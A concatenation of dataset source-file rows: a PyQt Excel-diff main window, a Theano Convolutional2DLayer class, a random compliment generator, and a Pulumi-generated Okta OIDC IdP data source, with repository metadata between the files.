        self.ColorSettings = QSettings("ExcelDiffer", "Color");
        if self.ColorSettings.contains("hightlight") == False:
            self.ColorSettings.setValue("hightlight", "#909399");
            self.ColorSettings.setValue("background", "#FFFFFF");
            self.ColorSettings.setValue("exchange", "#EBEEF5");
            self.ColorSettings.setValue("add", "#409EFF");
            self.ColorSettings.setValue("delcolor", "#F56C6C");
            self.ColorSettings.setValue("change", "#E6A23C");
        self.bar = self.statusBar()
        self.initAction()
        self.initMenu()
        self.initToolBar()
        # Diff engines keyed by sheet name; "###" is the single-sheet default engine.
        self.Alg = {}
        self.Alg["###"] = MyAlg()

    def restoreToWinSetting(self):
        """Restore the layout last saved by saveToWinSetting (asks for confirmation)."""
        reply = QMessageBox.warning(self, "确定恢复上次保存的窗口布局吗?", "确定恢复上次保存的窗口布局吗?", QMessageBox.Yes | QMessageBox.No, QMessageBox.No);
        if reply == QMessageBox.No:
            return
        try:
            self.WinSettings = QSettings("ExcelDiffer", "ExcelDiffer");
            self.restoreGeometry(self.WinSettings.value("geometry"));
            self.restoreState(self.WinSettings.value("windowState"));
        except:
            # Nothing saved yet (or unreadable values) -- silently keep the current layout.
            pass

    def saveToWinSetting(self):
        """Persist the current window geometry and dock state."""
        self.WinSettings = QSettings("ExcelDiffer", "ExcelDiffer");
        self.WinSettings.setValue("geometry", self.saveGeometry());
        self.WinSettings.setValue("windowState", self.saveState());

    def restoreToWinInit(self):
        """Reset the layout to the state captured at startup (asks for confirmation)."""
        reply = QMessageBox.warning(self, "确定恢复默认吗?", "确认将窗口恢复默认吗?", QMessageBox.Yes | QMessageBox.No, QMessageBox.No);
        if reply == QMessageBox.No:
            return
        self.WinSettings = QSettings("ExcelDiffer", "ExcelDifferInit");
        self.restoreGeometry(self.WinSettings.value("geometry"));
        self.restoreState(self.WinSettings.value("windowState"));

    def chooseColor(self):
        """Open the modal highlight-color configuration dialog."""
        self.CW = ChangeColorWidget()
        self.CW.exec_()

    def restoreToColorInit(self):
        """Reset all diff highlight colors to their defaults (asks for confirmation)."""
        reply = QMessageBox.warning(self, "确定恢复默认颜色吗?", "确定恢复默认颜色吗?", QMessageBox.Yes | QMessageBox.No, QMessageBox.No);
        if reply == QMessageBox.No:
            return
        self.ColorSettings = QSettings("ExcelDiffer", "Color");
        self.ColorSettings.setValue("hightlight", "#909399");
        self.ColorSettings.setValue("background", "#FFFFFF");
        self.ColorSettings.setValue("exchange", "#EBEEF5");
        self.ColorSettings.setValue("add", "#409EFF");
        self.ColorSettings.setValue("delcolor", "#F56C6C");
        self.ColorSettings.setValue("change", "#E6A23C");
        QMessageBox.information(self, "提示", "恢复成功,请重新比较", QMessageBox.Yes);

    def initAction(self):
        """Create every QAction (icon, shortcut, status tip) and wire its handler."""
        self.anaAct = QAction(QIcon("icon/ana.png"),'开始比较', self)
        self.anaAct.setShortcut('Ctrl+A')
        self.anaAct.setStatusTip("开始比较")
        self.anaAct.triggered.connect(self.beginAna)
        self.openOldAct = QAction(QIcon("icon/openold.ico"),'打开旧文件', self)
        self.openOldAct.setShortcut('Ctrl+O')
        self.openOldAct.setStatusTip("打开旧版文件用于比较")
        self.openOldAct.triggered.connect(self.openOldFile)
        self.openNewAct = QAction(QIcon("icon/opennew.ico"),'打开新文件', self)
        self.openNewAct.setShortcut('Ctrl+N')
        self.openNewAct.setStatusTip("打开新的文件用于比较")
        self.openNewAct.triggered.connect(self.openNewFile)
        self.showRowDiffWinAct = QAction('打开行改动窗口', self)
        self.showRowDiffWinAct.setStatusTip("打开行改动窗口")
        self.showRowDiffWinAct.triggered.connect(self.RowDiffDock.show)
        self.showColDiffWinAct = QAction('打开列改动窗口', self)
        self.showColDiffWinAct.setStatusTip("打开列改动窗口")
        self.showColDiffWinAct.triggered.connect(self.ColDiffDock.show)
        self.showCellDiffWinAct = QAction('打开格改动窗口', self)
        self.showCellDiffWinAct.setStatusTip("打开格改动窗口")
        self.showCellDiffWinAct.triggered.connect(self.CellDiffDock.show)
        self.saveWinAct = QAction('保存当前窗口状态', self)
        self.saveWinAct.setStatusTip("保存当前窗口状态")
        self.saveWinAct.triggered.connect(self.saveToWinSetting)
        self.restoreWinAct = QAction('读取窗口状态', self)
        self.restoreWinAct.setStatusTip("读取窗口状态")
        self.restoreWinAct.triggered.connect(self.restoreToWinSetting)
        self.restoreInitWinAct = QAction('恢复默认窗口状态', self)
        self.restoreInitWinAct.setStatusTip("恢复默认窗口状态")
        self.restoreInitWinAct.triggered.connect(self.restoreToWinInit)
        self.zoomInAct = QAction(QIcon("icon/zoom-in.png"),'增加字体大小', self)
        self.zoomInAct.setShortcut(QKeySequence.ZoomIn)
        self.zoomInAct.setStatusTip("增加字体大小")
        self.zoomInAct.triggered.connect(self.zoomIn)
        self.zoomOutAct = QAction(QIcon("icon/zoom-out.png"),'减少字体大小', self)
        self.zoomOutAct.setShortcut(QKeySequence.ZoomOut)
        self.zoomOutAct.setStatusTip("减少字体大小")
        self.zoomOutAct.triggered.connect(self.zoomOut)
        self.chooseFontAct = QAction(QIcon("icon/chafont.png"),'选择表格字体', self)
        self.chooseFontAct.setStatusTip("选择表格字体")
        self.chooseFontAct.triggered.connect(self.chooseFont)
        self.restoreFontAct = QAction(QIcon("icon/refont.png"),'恢复默认字体', self)
        self.restoreFontAct.setStatusTip("恢复默认字体")
        # Reset the stored default point size, then reapply the initial font to the tables.
        self.restoreFontAct.triggered.connect(lambda : self.initFont.setPointSize(self.ps) or self.setTableFont(self.initFont))
        self.chooseColorAct = QAction(QIcon("icon/chacol.png"),'更改颜色', self)
        self.chooseColorAct.setStatusTip("更改表格颜色设置")
        self.chooseColorAct.triggered.connect(self.chooseColor)
        self.restoreColorAct = QAction(QIcon("icon/recol.png"),'恢复默认颜色', self)
        self.restoreColorAct.setStatusTip("更改表格颜色设置")
        self.restoreColorAct.triggered.connect(self.restoreToColorInit)
        self.qssAct = QAction('切换背景', self)
        self.qssAct.setStatusTip("在白天模式和夜间模式切换")
        self.qssAct.triggered.connect(self.changeQSS)

    def changeQSS(self):
        """Toggle between day mode (no stylesheet) and night mode (style.qss)."""
        if self.qss == True:
            # NOTE(review): this file handle is never closed; consider a with-block.
            f = open('style.qss', 'r')
            self.setStyleSheet(f.read())
            self.qss = False
        else:
            self.setStyleSheet("")
            self.qss = True

    def chooseFont(self):
        """Let the user pick a table font via QFontDialog and apply it if accepted."""
        a = QFontDialog.getFont(self.currentFont,self)
        if a[1]:
            self.setTableFont(a[0])

    def setTableFont(self,font):
        """Apply *font* to every sheet table (old and new) and resize cells to fit."""
        self.currentFont = font
        for widget in self.CentralWidget.OldTableWidget.TableWidgets:
            widget.setFont(font)
            widget.verticalHeader().setFont(font)
            widget.horizontalHeader().setFont(font)
            QTableWidget.resizeColumnsToContents(widget)
            QTableWidget.resizeRowsToContents(widget)
        for widget in self.CentralWidget.NewTableWidget.TableWidgets:
            widget.setFont(font)
            widget.verticalHeader().setFont(font)
            widget.horizontalHeader().setFont(font)
            QTableWidget.resizeColumnsToContents(widget)
            QTableWidget.resizeRowsToContents(widget)

    def zoomIn(self):
        """Increase the table font by one point (capped below 200)."""
        font = self.currentFont
        size = font.pointSize()+1
        if size == 200: size = size - 1
        font.setPointSize(size)
        self.setTableFont(font)

    def zoomOut(self):
        """Decrease the table font by one point (never below 2)."""
        font = self.currentFont
        size = font.pointSize()-1
        if size == 1: size = size + 1
        font.setPointSize(size)
        self.setTableFont(font)

    def initToolBar(self):
        """Populate the main toolbar and the central widget's own toolbar."""
        self.toolbar = self.addToolBar('tool')
        self.toolbar.setObjectName("toolbar")
        self.toolbar.addAction(self.anaAct)
        self.toolbar.addSeparator()
        self.toolbar.addAction(self.openOldAct)
        self.toolbar.addAction(self.openNewAct)
        self.CentralWidget.toolbar.addAction(self.zoomInAct)
        self.CentralWidget.toolbar.addAction(self.zoomOutAct)
        self.CentralWidget.toolbar.addAction(self.chooseFontAct)
        self.CentralWidget.toolbar.addAction(self.restoreFontAct)
        self.CentralWidget.toolbar.addSeparator()
        self.CentralWidget.toolbar.addAction(self.chooseColorAct)
        self.CentralWidget.toolbar.addAction(self.restoreColorAct)
        self.CentralWidget.toolbar.addSeparator()
        self.CentralWidget.toolbar.addAction(self.CentralWidget.UnlockAction)

    def initMenu(self):
        """Build the menu bar (file / compare / window / format / theme menus)."""
        menubar = self.menuBar()
        fileMenu = menubar.addMenu('文件')
        anaMenu = menubar.addMenu('比较')
        winMenu = menubar.addMenu('窗口')
        formatMenu = menubar.addMenu('格式')
        nightMenu = menubar.addMenu('切换模式')
        nightMenu.addAction(self.qssAct)
        openMenu = QMenu('打开', self)
        openMenu.addAction(self.openOldAct)
        openMenu.addAction(self.openNewAct)
        fileMenu.addMenu(openMenu)
        anaMenu.addAction(self.anaAct)
        winMenu.addAction(self.showRowDiffWinAct)
        winMenu.addAction(self.showColDiffWinAct)
        winMenu.addAction(self.showCellDiffWinAct)
        winMenu.addSeparator()
        winMenu.addAction(self.saveWinAct)
        winMenu.addAction(self.restoreWinAct)
        winMenu.addAction(self.restoreInitWinAct)
        formatMenu.addAction(self.zoomInAct)
        formatMenu.addAction(self.zoomOutAct)
        formatMenu.addSeparator()
        formatMenu.addAction(self.chooseFontAct)
        formatMenu.addAction(self.restoreFontAct)
        formatMenu.addSeparator()
        formatMenu.addAction(self.chooseColorAct)
        formatMenu.addAction(self.restoreColorAct)

    def openOldFile(self):
        """Pick the old workbook, load it on a worker thread, and reset diff state."""
        if self.isanaing == True:
            QMessageBox.warning(self, "提示", "正在分析!请稍等!", QMessageBox.Ok)
            return
        fname = QFileDialog.getOpenFileName(self, '打开旧文件',"","Excel(*.xlsx *.xls)")
        self.oldfilename = fname[0]
        if fname[0] != '':
            self.OpenOldThread = OpenFileThread(fname[0])
            self.OpenOldThread.finished.connect(self.openOldDone)
            self.OpenOldThread.start()
        # Any previous diff results are now stale.
        self.CellDiffWidget.clear()
        self.RowDiffWidget.clear()
        self.ColDiffWidget.clear()
        self.IsAna = False
        self.SheetDiff = {}
        try:
            self.CentralWidget.OldTableWidget.currentChanged.disconnect(self.setDiff)
        except:
            # Not connected yet -- nothing to disconnect.
            pass

    def openNewFile(self):
        """Pick the new workbook, load it on a worker thread, and reset diff state."""
        if self.isanaing == True:
            QMessageBox.warning(self, "提示", "正在分析!请稍等!", QMessageBox.Ok)
            return
        fname = QFileDialog.getOpenFileName(self, '打开新文件',"","Excel(*.xlsx *.xls)")
        self.newfilename = fname[0]
        if fname[0] != '':
            self.OpenNewThread = OpenFileThread(fname[0])
            self.OpenNewThread.finished.connect(self.openNewDone)
            self.OpenNewThread.start()
        # Any previous diff results are now stale.
        self.CellDiffWidget.clear()
        self.RowDiffWidget.clear()
        self.ColDiffWidget.clear()
        self.IsAna = False
        self.SheetDiff = {}
        try:
            self.CentralWidget.OldTableWidget.currentChanged.disconnect(self.setDiff)
        except:
            # Not connected yet -- nothing to disconnect.
            pass

    def openNewDone(self):
        """Slot: new workbook finished loading; show its sheets."""
        self.NewXlsx = self.OpenNewThread.Xlrd
        self.CentralWidget.setNewTable(self.NewXlsx.SheetDatas)

    def openOldDone(self):
        """Slot: old workbook finished loading; show its sheets."""
        self.OldXlsx = self.OpenOldThread.Xlrd
        self.CentralWidget.setOldTable(self.OldXlsx.SheetDatas)

    def beginAna(self):
        """Start a diff run.

        With the view unlocked, compares only the two currently selected
        sheets; with it locked, compares every same-named sheet pair in both
        workbooks, coloring added/deleted sheet tabs as it goes.
        """
        self.Threads = []
        self.ColorSettings = QSettings("ExcelDiffer", "Color");
        addcol = self.ColorSettings.value("add")
        delcol = self.ColorSettings.value("delcolor")
        oi = self.CentralWidget.OldTableWidget.currentIndex()
        ni = self.CentralWidget.NewTableWidget.currentIndex()
        if oi == -1 or ni ==-1:
            QMessageBox.warning(self, "提示", "请先打开Excel!", QMessageBox.Ok)
            return
        # NOTE(review): oldfilename/newfilename are only assigned by the open
        # dialogs -- TODO confirm this path cannot be reached before both ran.
        if self.oldfilename == self.newfilename:
            QMessageBox.warning(self, "提示", "文件相同,无需比较。", QMessageBox.Ok)
            return
        if self.isanaing == True:
            QMessageBox.warning(self, "提示", "正在分析!请稍等!", QMessageBox.Ok)
            return
        if self.CentralWidget.Lock == False:
            # Single-sheet mode: diff the currently selected old/new sheets.
            reply = QMessageBox.warning(self, "确定比较吗?", "将要比较 "+self.OldXlsx.SheetDatas[oi]["name"]+" 和 "+self.NewXlsx.SheetDatas[ni]["name"], QMessageBox.Yes | QMessageBox.No, QMessageBox.No);
            if reply == QMessageBox.No:
                return
            self.Alg["###"].setOldData(self.OldXlsx.SheetDatas[oi])
            self.Alg["###"].setNewData(self.NewXlsx.SheetDatas[ni])
            self.isanaing =True
            thread = Thread(self)
            thread.done.connect(self.doneDiffOne)
            thread.window.Alg["###"].statueSignal.connect(self.bar.showMessage)
            thread.start()
            self.Threads.append(thread)
        else:
            # Whole-file mode: diff every pair of same-named sheets.
            reply = QMessageBox.warning(self, "确定比较吗?", "将要比较整个文件", QMessageBox.Yes | QMessageBox.No, QMessageBox.No);
            if reply == QMessageBox.No:
                return
            oldcount = self.CentralWidget.OldTableWidget.count()
            newcount = self.CentralWidget.NewTableWidget.count()
            self.SheetDiff = {}
            self.diffcount=0
            self.donecount=0
            self.delsheetcount = 0
            self.addsheetcount = 0
            # Count deleted sheets (present in old, missing from new) and color their tabs.
            for i in range(oldcount):
                flag = False
                for j in range(newcount):
                    if self.CentralWidget.OldTableWidget.tabText(i) == self.CentralWidget.NewTableWidget.tabText(j):
                        self.diffcount = self.diffcount+1
                        flag = True
                if flag == False:
                    self.CentralWidget.OldTableWidget.setTabBarColor(i,delcol)
                    self.delsheetcount = self.delsheetcount + 1
            # Count added sheets (present in new, missing from old) and color their tabs.
            for i in range(newcount):
                flag = False
                for j in range(oldcount):
                    if self.CentralWidget.OldTableWidget.tabText(j) == self.CentralWidget.NewTableWidget.tabText(i):
                        flag = True
                if flag == False:
                    self.CentralWidget.NewTableWidget.setTabBarColor(i,addcol)
                    self.addsheetcount = self.addsheetcount + 1
            have = False
            # Launch one worker thread per same-named sheet pair.
            for i in range(oldcount):
                for j in range(newcount):
                    if self.CentralWidget.OldTableWidget.tabText(i) == self.CentralWidget.NewTableWidget.tabText(j):
                        have = True
                        self.Alg[self.CentralWidget.OldTableWidget.tabText(i)] = MyAlg()
                        self.Alg[self.CentralWidget.OldTableWidget.tabText(i)].setOldData(self.OldXlsx.SheetDatas[i])
                        self.Alg[self.CentralWidget.OldTableWidget.tabText(i)].setNewData(self.NewXlsx.SheetDatas[j])
                        self.isanaing =True
                        thread = Thread(self,self.CentralWidget.OldTableWidget.tabText(i))
                        thread.done.connect(self.doneDiffAll)
                        thread.window.Alg[self.CentralWidget.OldTableWidget.tabText(i)].statueSignal.connect(self.bar.showMessage)
                        thread.start()
                        self.Threads.append(thread)
            if have == False:
                QMessageBox.information(self, "提示", "没有同名Sheet需要比较!", QMessageBox.Ok)

    def doneDiffAll(self,diff):
        """Slot (whole-file mode): collect one sheet's diff; once every pair is
        done, publish results for the current sheet and notify the user."""
        self.SheetDiff[diff["diffname"]]=diff
        self.donecount = self.donecount + 1
        if self.donecount == self.diffcount:
            self.IsAna = True
            self.isanaing =False
            # From now on, switching sheet tabs refreshes the diff docks.
            self.CentralWidget.OldTableWidget.currentChanged.connect(self.setDiff)
            # flag stays True only if no sheet reported any change.
            flag = True
            for diffff in self.SheetDiff:
                for item in self.SheetDiff[diffff]:
                    if len(self.SheetDiff[diffff][item]) != 0 and item != "diffname":
                        flag = False
            if flag == True:
                QMessageBox.information(self, "提示", "分析完毕!无改动!", QMessageBox.Ok)
                return
            oi = self.CentralWidget.OldTableWidget.currentIndex()
            text = self.CentralWidget.OldTableWidget.tabText(oi)
            if text in self.SheetDiff:
                self.RowDiffWidget.setData(self.SheetDiff[text])
                self.ColDiffWidget.setData(self.SheetDiff[text])
                self.CellDiffWidget.setData(self.SheetDiff[text])
                self.CentralWidget.setColor(self.SheetDiff[text])
            QMessageBox.information(self, "提示", "分析完毕,共新增了"+str(self.addsheetcount)+"个标签页,删除了"+str(self.delsheetcount)+"个标签页。\n切换标签页查看差异信息!", QMessageBox.Ok)

    def setDiff(self,id):
        """Slot: refresh the three diff docks when the user switches sheet tabs."""
        self.RowDiffWidget.clear()
        self.ColDiffWidget.clear()
        self.CellDiffWidget.clear()
        text = self.CentralWidget.OldTableWidget.tabText(id)
        if text in self.SheetDiff:
            self.RowDiffWidget.setData(self.SheetDiff[text])
            self.ColDiffWidget.setData(self.SheetDiff[text])
            self.CellDiffWidget.setData(self.SheetDiff[text])
            self.CentralWidget.setColor(self.SheetDiff[text])

    def doneDiffOne(self,diff):
        """Slot (single-sheet mode): publish the finished diff and notify the user."""
        self.SheetDiff = diff
        self.RowDiffWidget.setData(diff)
        self.ColDiffWidget.setData(diff)
        self.CellDiffWidget.setData(diff)
        self.CentralWidget.setColor(diff)
        self.IsAna = True
        self.isanaing =False
        self.bar.showMessage("分析完毕!")
        # flag stays True only when the diff reports no change at all.
        flag = True
        for item in diff:
            if len(diff[item]) != 0 and item != "diffname":
                flag = False
        if flag == False:
            QMessageBox.information(self, "提示", "分析完毕!", QMessageBox.Ok)
        else:
            QMessageBox.information(self, "提示", "分析完毕!无改动!", QMessageBox.Ok)
if __name__=="__main__":
app = QApplication(sys.argv)
main = MainWindow()
main.setWindowIcon(QIcon("icon/opennew.ico"))
main.show()
sys.exit(app.exec_()) | 22,472 | 102 | 753 |
00cc25d42e5c0a922ec20410dc202c6de8269caf | 2,130 | py | Python | core/layers/convolutional.py | luckylwk/neural-network-theano | 420c89e7028fcd9671866918c22a837d04387012 | [
"MIT"
] | null | null | null | core/layers/convolutional.py | luckylwk/neural-network-theano | 420c89e7028fcd9671866918c22a837d04387012 | [
"MIT"
] | null | null | null | core/layers/convolutional.py | luckylwk/neural-network-theano | 420c89e7028fcd9671866918c22a837d04387012 | [
"MIT"
] | null | null | null | import numpy as np
import theano
from ..utils.activation import *
from ..utils import weights
from .base import Layer
__all__ = [
"Convolutional2DLayer"
]
class Convolutional2DLayer(Layer):
'''
Standard Convolutional 2D Layer
'''
# -------------------- #
| 29.178082 | 119 | 0.624883 | import numpy as np
import theano
from ..utils.activation import *
from ..utils import weights
from .base import Layer
__all__ = [
"Convolutional2DLayer"
]
class Convolutional2DLayer(Layer):
    '''
    Standard Convolutional 2D Layer.

    Wraps theano.tensor.nnet.conv.conv2d with 'valid' border mode.
    Written for Python 2 (print statements, integer division).
    '''
    def __init__( self, kernels=8, kernelSize=(3,3), kernelStride=1, **kwargs ):
        # kernels: number of filters; kernelSize: (height, width); kernelStride: step size.
        super(Convolutional2DLayer, self).__init__( name="Convolutional 2D Layer", **kwargs )
        self.kernels = kernels # Int
        self.kernelSize = kernelSize # Tuple
        self.kernelStride = kernelStride # Int
        # NOTE(review): the second entry of a Theano filter shape is the number of
        # input feature maps; using kernelStride here looks suspicious -- confirm
        # against the callers before changing.
        self.filter = ( kernels, kernelStride, kernelSize[0], kernelSize[1] )
        if self.verbose: self.printVerbose()
    # -------------------- #
    def _calcOutputDimensions( self ):
        # 'valid' convolution output size per spatial axis: (in - kernel) / stride + 1.
        # Integer division under Python 2.
        cols = ( (self.inputDim[2] - self.kernelSize[0]) / self.kernelStride + 1 )
        rows = ( (self.inputDim[3] - self.kernelSize[1]) / self.kernelStride + 1 )
        self.outputDim = ( self.inputDim[0], self.kernels, cols, rows )
    # -------------------- #
    def _initParams( self ):
        # Weights W and biases b are zero-initialised Theano shared variables.
        self.W = theano.shared( weights.Constant(val=0.0)(self.filter), borrow=True )
        self.b = theano.shared( weights.Constant(val=0.0)((self.filter[0],)), borrow=True )
        print 'Debug: ', type(self.W), self.W.shape.eval() #, self.W.get_value()[:2]
        self.params = [ self.W, self.b ]
    # -------------------- #
    def _calcOutput( self ):
        # Documentation: http://deeplearning.net/software/theano/library/tensor/nnet/conv.html#theano.tensor.nnet.conv.conv2d
        self.output = theano.tensor.nnet.conv.conv2d(
            input=self.input,
            filters=self.W,
            filter_shape=(self.kernels, self.kernelStride) + self.kernelSize,
            image_shape=self.inputDim,
            border_mode='valid'
        )
    # -------------------- #
    def printVerbose( self ):
        # Human-readable dump of the layer configuration (Python 2 print statements).
        print '\t --- Initialising {}'.format( self.name )
        print '\t\t# Kernels: {}'.format( self.kernels )
        print '\t\tKernel Size: {}'.format( self.kernelSize )
        print '\t\tKernel Stride: {}'.format( self.kernelStride )
        print '\t\tInput Size: {}'.format( self.inputDim )
        print '\t\tOutput Size: {}'.format( self.outputDim )
    # -------------------- #
    # -------------------- #
| 1,732 | 0 | 121 |
d1ad0c5bb325cb4499e41ad36a0532ffc37e5ae2 | 2,613 | py | Python | compliments.py | Boijangle/GroupMe-Message-Bot | 0b70e5e04de4e5e757f7f2aa540f795a1039f7af | [
"MIT"
] | 2 | 2017-05-14T02:53:02.000Z | 2017-05-14T03:12:46.000Z | compliments.py | Boijangle/miniature-octo-happiness | 0b70e5e04de4e5e757f7f2aa540f795a1039f7af | [
"MIT"
] | 4 | 2017-07-18T22:24:12.000Z | 2018-07-23T01:07:05.000Z | compliments.py | Boijangle/GroupMe-Message-Bot | 0b70e5e04de4e5e757f7f2aa540f795a1039f7af | [
"MIT"
] | 2 | 2017-07-25T02:02:15.000Z | 2017-07-27T03:07:32.000Z | import random
| 33.075949 | 91 | 0.592423 | import random
def generate_compliment():
    """Return one random compliment sentence of the form 'you are <phrase>.'.

    Output matches the original implementation (subject 'you', verb 'are',
    one random ending). Fixes: the original shuffled three lists (two of
    them singletons) and indexed them through a dead single-iteration
    for/try loop, storing the result string in a variable misleadingly
    named list_of_sentences. random.choice does the same job directly.
    """
    # Sentence subjects and verbs; kept as lists so more can be added later.
    part1 = [
        "you",
    ]
    part2 = [
        "are",
    ]
    # Sentence endings; one is chosen uniformly at random.
    part3 = [
        "extremely intuitive",
        "a searcher of hidden meanings",
        "sensitive and perceptive",
        "gifted at reading others",
        "a holder of strong convictions and beliefs",
        "a person who will not compromise their ideals",
        "genuinely warm and affirming by nature",
        "capable of trusting your own instincts (and with good reason)",
        "usually right and you usually know it",
        "typically gentle and caring",
        "usually have good communication skills",
        "a gifted writer",
        "committed and you take commitment seriously",
        "the reason why I admire you deeply",
        "a seeker of lifelong relationships",
        "a good listener",
        "deep, complex and intense",
        "artistic and creative",
        "a inspirator, a motivator, an achiever",
        "extremely insightful about people and situations",
        "a Perfectionist",
        "natural nurturer",
        "devoted to and protective of those they care about",
        "the rarest of all types",
        "an independent worker",
        "in some ways, be easy-going",
        "everything I want to be",
        "very important to me",
        "not a failure",
        "special and idiosyncratic (heh, in a good way)",
        "beautiful, not just outside, but deep inside as well",
        "the person I want to risk myself for because God risk Himself on me",
        "perfection, even the sun is jealous of the way you shine",
        "so kind to others",
        "a believer that there is good in this world",
        "constantly racing through my mind",
        "the next Victoria Secret Model",
        "loved always",
        "pretty, witty, and gracious",
        "important",
        "geniune and sincere",
        "one I went to spend my time with, even the future",
        "hotter than donut grease",
        "a snack",
    ]
    # One uniform draw per part replaces the original shuffle-then-take-index-0
    # pattern; the distribution of sentences is unchanged.
    return "{} {} {}.".format(
        random.choice(part1), random.choice(part2), random.choice(part3)
    )
| 2,576 | 0 | 23 |
1f1bf8f5346cc8b928d9001b4cf006dae1340144 | 10,791 | py | Python | sdk/python/pulumi_okta/idp/get_oidc.py | pulumi/pulumi-okta | 83f7617a85b3d05213901773fa4e6a151ab6076b | [
"ECL-2.0",
"Apache-2.0"
] | 5 | 2019-10-29T21:59:22.000Z | 2021-11-08T12:00:24.000Z | sdk/python/pulumi_okta/idp/get_oidc.py | pulumi/pulumi-okta | 83f7617a85b3d05213901773fa4e6a151ab6076b | [
"ECL-2.0",
"Apache-2.0"
] | 109 | 2020-01-06T10:28:09.000Z | 2022-03-25T19:52:40.000Z | sdk/python/pulumi_okta/idp/get_oidc.py | pulumi/pulumi-okta | 83f7617a85b3d05213901773fa4e6a151ab6076b | [
"ECL-2.0",
"Apache-2.0"
] | 2 | 2020-09-11T16:31:04.000Z | 2020-11-24T12:23:17.000Z | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = [
'GetOidcResult',
'AwaitableGetOidcResult',
'get_oidc',
]
@pulumi.output_type
class GetOidcResult:
"""
A collection of values returned by getOidc.
"""
@property
@pulumi.getter(name="authorizationBinding")
def authorization_binding(self) -> str:
"""
The method of making an authorization request.
"""
return pulumi.get(self, "authorization_binding")
@property
@pulumi.getter(name="authorizationUrl")
def authorization_url(self) -> str:
"""
IdP Authorization Server (AS) endpoint to request consent from the user and obtain an authorization code grant.
"""
return pulumi.get(self, "authorization_url")
@property
@pulumi.getter(name="clientId")
def client_id(self) -> str:
"""
Unique identifier issued by AS for the Okta IdP instance.
"""
return pulumi.get(self, "client_id")
@property
@pulumi.getter(name="clientSecret")
def client_secret(self) -> str:
"""
Client secret issued by AS for the Okta IdP instance.
"""
return pulumi.get(self, "client_secret")
@property
@pulumi.getter
def id(self) -> Optional[str]:
"""
id of idp.
"""
return pulumi.get(self, "id")
@property
@pulumi.getter(name="issuerMode")
def issuer_mode(self) -> str:
"""
Indicates whether Okta uses the original Okta org domain URL, or a custom domain URL.
"""
return pulumi.get(self, "issuer_mode")
@property
@pulumi.getter(name="issuerUrl")
def issuer_url(self) -> str:
"""
URI that identifies the issuer.
"""
return pulumi.get(self, "issuer_url")
@property
@pulumi.getter(name="jwksBinding")
def jwks_binding(self) -> str:
"""
The method of making a request for the OIDC JWKS.
"""
return pulumi.get(self, "jwks_binding")
@property
@pulumi.getter(name="jwksUrl")
def jwks_url(self) -> str:
"""
Endpoint where the keys signer publishes its keys in a JWK Set.
"""
return pulumi.get(self, "jwks_url")
@property
@pulumi.getter(name="maxClockSkew")
def max_clock_skew(self) -> int:
"""
Maximum allowable clock-skew when processing messages from the IdP.
"""
return pulumi.get(self, "max_clock_skew")
@property
@pulumi.getter
def name(self) -> Optional[str]:
"""
name of the idp.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="protocolType")
def protocol_type(self) -> str:
"""
The type of protocol to use.
"""
return pulumi.get(self, "protocol_type")
@property
@pulumi.getter
def scopes(self) -> Sequence[str]:
"""
The scopes of the IdP.
"""
return pulumi.get(self, "scopes")
@property
@pulumi.getter(name="tokenBinding")
def token_binding(self) -> str:
"""
The method of making a token request.
"""
return pulumi.get(self, "token_binding")
@property
@pulumi.getter(name="tokenUrl")
def token_url(self) -> str:
"""
IdP Authorization Server (AS) endpoint to exchange the authorization code grant for an access token.
"""
return pulumi.get(self, "token_url")
@property
@pulumi.getter
def type(self) -> str:
"""
type of idp.
"""
return pulumi.get(self, "type")
@property
@pulumi.getter(name="userInfoBinding")
def user_info_binding(self) -> str:
"""
The method of making a user info request.
"""
return pulumi.get(self, "user_info_binding")
@property
@pulumi.getter(name="userInfoUrl")
def user_info_url(self) -> str:
"""
Protected resource endpoint that returns claims about the authenticated user.
"""
return pulumi.get(self, "user_info_url")
# pylint: disable=using-constant-test
def get_oidc(id: Optional[str] = None,
             name: Optional[str] = None,
             opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetOidcResult:
    """
    Use this data source to retrieve a OIDC IdP from Okta.
    ## Example Usage
    ```python
    import pulumi
    import pulumi_okta as okta
    example = okta.idp.get_oidc(name="Example Provider")
    ```
    :param str id: The id of the idp to retrieve, conflicts with `name`.
    :param str name: The name of the idp to retrieve, conflicts with `id`.
    """
    # NOTE: this function was generated by the Pulumi Terraform Bridge (tfgen);
    # do not hand-edit -- changes will be overwritten on regeneration.
    __args__ = dict()
    __args__['id'] = id
    __args__['name'] = name
    if opts is None:
        opts = pulumi.InvokeOptions()
    if opts.version is None:
        # Pin the invoke to this SDK's version when the caller did not specify one.
        opts.version = _utilities.get_version()
    # Synchronous invoke against the Okta provider; .value holds the typed result.
    __ret__ = pulumi.runtime.invoke('okta:idp/getOidc:getOidc', __args__, opts=opts, typ=GetOidcResult).value
    return AwaitableGetOidcResult(
        authorization_binding=__ret__.authorization_binding,
        authorization_url=__ret__.authorization_url,
        client_id=__ret__.client_id,
        client_secret=__ret__.client_secret,
        id=__ret__.id,
        issuer_mode=__ret__.issuer_mode,
        issuer_url=__ret__.issuer_url,
        jwks_binding=__ret__.jwks_binding,
        jwks_url=__ret__.jwks_url,
        max_clock_skew=__ret__.max_clock_skew,
        name=__ret__.name,
        protocol_type=__ret__.protocol_type,
        scopes=__ret__.scopes,
        token_binding=__ret__.token_binding,
        token_url=__ret__.token_url,
        type=__ret__.type,
        user_info_binding=__ret__.user_info_binding,
        user_info_url=__ret__.user_info_url)
| 36.456081 | 349 | 0.643963 | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = [
'GetOidcResult',
'AwaitableGetOidcResult',
'get_oidc',
]
@pulumi.output_type
class GetOidcResult:
"""
A collection of values returned by getOidc.
"""
    def __init__(__self__, authorization_binding=None, authorization_url=None, client_id=None, client_secret=None, id=None, issuer_mode=None, issuer_url=None, jwks_binding=None, jwks_url=None, max_clock_skew=None, name=None, protocol_type=None, scopes=None, token_binding=None, token_url=None, type=None, user_info_binding=None, user_info_url=None):
        # Generated constructor (Pulumi Terraform Bridge): type-checks each field
        # and stores it with pulumi.set; values are read back via the @property
        # accessors using pulumi.get.
